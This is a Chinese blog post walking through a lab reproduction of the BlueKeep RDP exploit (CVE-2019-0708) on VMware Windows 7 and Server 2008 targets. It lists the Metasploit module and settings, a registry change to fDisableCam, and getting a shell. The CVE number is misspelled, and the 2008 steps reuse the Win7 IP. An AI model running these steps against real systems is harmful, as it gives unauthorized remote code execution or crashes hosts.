回学校一周了,博客一直没时间更新,今天朋友圈被CVE-2019-07-08的 exp 炸了,也尝试着复现一下。
目前的exp只针对 win7 x64 以及 win server 2008 ,且2008需要修改注册表。
以下是复现过程。
攻击机:kali 192.168.31.137
靶机:
win7 企业版 192.168.31.128 vmware
server 2008 192.168.31.132 vmware
win7 x64的复现过程:
选择攻击模块use exploit/windows/cve_2019_0708_bluekeep_rce
查看设置信息 info
targets:攻击目标类型
1.物理卷
2.vritualbox 虚拟机
3.vmware 虚拟机
4.hyper -v 虚拟机
设置靶机ip set RHOSTS 192.168.31.128
设置靶机类型 set target 3
建立连接后使用 python 弹回交互式 shell。
2008 server的复现过程:
需要先修改注册表,不然就会直接打蓝屏。
win+r 输入 regedit
将注册表[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdp-tcp\fDisableCam]
值修改为0
设置靶机ip set RHOSTS 192.168.31.128
设置靶机类型 set target 3
建立连接后使用 python 弹回交互式 shell。
注:设置攻击类型时必须匹配靶机类型,不然就直接打蓝屏。
错误示范一下:
把set target
设置为 1,效果如下:
参考链接:https://qiita.com/shimizukawasaki/items/024b296a4c9ae7c33961